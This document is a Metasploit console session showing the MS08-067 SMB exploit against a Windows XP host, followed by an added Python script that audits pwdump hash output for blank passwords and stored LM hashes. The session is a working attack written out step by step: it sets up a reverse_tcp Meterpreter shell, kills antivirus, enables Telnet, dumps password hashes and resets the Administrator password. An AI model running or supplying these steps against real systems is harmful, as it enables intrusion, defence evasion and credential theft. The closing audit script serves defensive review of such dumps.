
msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...

Exploits
========

   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   windows/smb/ms03_049_netapi  2003-11-11       good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi  2006-08-08       great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc  2006-11-14       manual  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi  2008-10-28       great   Microsoft Server Service Relative Path Stack Corruption

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOADS windows/meterpreter/reverse_tcp
PAYLOADS => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.254.100
RHOST => 192.168.254.100
msf exploit(ms08_067_netapi) > set LHOST 192.168.254.17
LHOST => 192.168.254.17
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.254.17:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.254.100
[*] Meterpreter session 1 opened (192.168.254.17:4444 -> 192.168.254.100:2782) at 2011-05-30 22:20:14 +0700

meterpreter > run killav
[*] Killing Antivirus services on the target...
[*] Killing off avgrsx.exe...
[*] Killing off nvsvc32.exe...
[*] Killing off avgemc.exe...
meterpreter > run gettelnet -e
[*] Windows Telnet Server Enabler Meterpreter Script
[*] Setting Telnet Server Services service startup mode
[*] The Telnet Server Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/gettelnet/clean_up__20110530.2319.rc
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:eade9179ce44a99c0697a4bb62ac244a:91715c0aa4c55eb7937911f6319a18b8:::
sunset_master:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:772fddab19197f6b656d0be42c157d2a:::
meterpreter > execute -f cmd.exe -c
Process 1124 created.
Channel 4 created.
meterpreter > interact 4
Interacting with channel 4...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user Administrator password
net user Administrator password
The command completed successfully.
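The hashdump output in the session above is in pwdump format (user:RID:LM-hash:NT-hash:::). The following is an added audit script, not part of the original session, that a defender or incident responder can run over such a dump of their own systems to see at a glance why this host was so easy to take over: three of the five accounts, including the built-in Administrator (RID 500), carry the NT hash of the empty string, i.e. a blank password, and one account still has a legacy LM hash stored. The sample input is the five lines from the session, reassembled where the scrape wrapped them; the two hash constants are the well-known empty-string LM and NT hashes, and the function names are my own.

```python
import re

# Well-known hashes of the empty string (assumed constants, stated here rather than taken
# from any library):
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the password is blank

# Constructed sample input: the five hashdump lines from the session above, with the
# scrape's line wraps inside the hashes joined back together.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:eade9179ce44a99c0697a4bb62ac244a:91715c0aa4c55eb7937911f6319a18b8:::
sunset_master:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:772fddab19197f6b656d0be42c157d2a:::
"""

# pwdump record layout: user:RID:LM-hash:NT-hash::: (the trailing fields are unused here)
PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Parse pwdump-format text into a list of dicts; blank lines are skipped and a
    malformed line raises ValueError so a truncated dump is not silently under-reported."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line:
            continue
        match = PWDUMP_LINE.match(line)
        if match is None:
            raise ValueError(f"line {lineno}: not a pwdump record: {line!r}")
        records.append({
            "user": match.group("user"),
            "rid": int(match.group("rid")),
            "lm": match.group("lm").lower(),
            "nt": match.group("nt").lower(),
        })
    return records


def audit_accounts(records):
    """Return a list of (user, [issues]) for every account in a weak credential state."""
    findings = []
    for rec in records:
        issues = []
        if rec["nt"] == EMPTY_NT:
            issues.append("blank password (NT hash of the empty string)")
        if rec["lm"] != EMPTY_LM:
            issues.append("LM hash stored (legacy hash; disable LM hash storage)")
        if issues and rec["rid"] == 500:
            issues.append("built-in Administrator account (RID 500): highest priority")
        if issues:
            findings.append((rec["user"], issues))
    return findings


def audit_report(text):
    """Parse and audit in one step, returning findings keyed by user name."""
    return {user: issues for user, issues in audit_accounts(parse_pwdump(text))}


if __name__ == "__main__":
    for user, issues in audit_accounts(parse_pwdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {'; '.join(issues)}")
```

On the sample, Administrator, Guest and sunset_master are reported with blank passwords, HelpAssistant is reported for its stored LM hash, and SUPPORT_388945a0 (no LM hash, non-empty NT hash) produces no finding. The same check is worth running against a full SAM or Active Directory export rather than a single host.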
